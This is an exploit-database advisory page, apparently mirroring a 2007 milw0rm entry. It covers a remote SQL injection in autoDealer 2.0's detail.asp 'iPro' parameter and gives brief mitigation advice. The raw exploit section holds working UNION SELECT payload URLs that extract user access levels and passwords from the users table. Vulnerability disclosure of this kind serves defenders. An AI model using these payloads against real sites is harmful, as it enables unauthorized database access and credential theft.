autoDealer - exploit.company

vendor:

autoDealer

by:

ajann

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: autoDealer

Affected Version From: autoDealer <= 2.0

Affected Version To: autoDealer <= 2.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability

The autoDealer version 2.0 (iPro) is vulnerable to a remote SQL injection attack. An attacker can exploit the vulnerability by injecting malicious SQL code in the 'iPro' parameter in the 'detail.asp' page. This allows the attacker to manipulate the SQL query and retrieve sensitive information from the database. An example of a payload is 'detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users'.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users can mitigate the risk by implementing input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspsiteware.com
# $$      :  $60.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//detail.asp?iPro=[SQL]

Example:

//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
//detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-01]